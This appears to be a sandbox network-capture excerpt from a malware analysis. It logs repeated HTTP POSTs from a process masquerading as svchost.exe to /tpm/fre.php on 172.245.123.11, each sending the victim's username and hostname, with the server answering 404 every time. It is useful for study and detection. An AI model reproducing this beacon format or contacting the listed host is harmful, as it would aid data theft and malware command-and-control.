Jan 7, 2025 11:03:27.380300045 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:27.880409956 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:27 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	50107	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:28.010884047 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:28.015736103 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:28.538222075 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:28 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	50108	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:28.698115110 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:28.703037024 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:29.206713915 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:29 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.5	50109	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:29.344556093 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:29.349451065 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:29.874355078 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:29 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.5	50110	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:30.021231890 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:30.026092052 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:30.549503088 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:30 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.5	50111	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:30.696604967 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:30.701445103 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:31.244743109 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:31 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.5	50112	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:31.401582956 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:31.406579971 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:31.926682949 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:31 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.5	50113	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:32.062737942 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:32.067626953 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:32.585803032 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:32 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.5	50114	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:32.729106903 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:32.733952999 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:33.260466099 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:33 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.5	50115	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:33.428402901 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:33.433269978 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:34.641026974 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:33 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Jan 7, 2025 11:03:34.641077995 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:33 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Jan 7, 2025 11:03:34.641210079 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:33 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.5	50116	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:34.777829885 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:34.782674074 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:35.284744978 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:35 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.5	50117	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:35.417725086 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:35.422765970 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:35.968166113 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:35 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.5	50118	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:36.106273890 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:36.111249924 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:36.632415056 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:36 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.5	50119	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:36.780884027 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:36.787347078 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:37.297065020 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:37 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.5	50120	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:37.437613010 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:37.443278074 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:37.931905031 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:37 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.5	50121	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:38.073981047 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:38.078880072 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:38.582405090 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:38 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.5	50122	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:38.715842962 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:38.720674038 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:39.249047995 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:39 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.5	50123	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:39.385117054 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:39.392735958 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:39.917833090 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:39 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.5	50124	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:40.057842016 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:40.062714100 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:40.576606035 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:40 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.5	50125	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:40.719878912 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:40.725261927 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
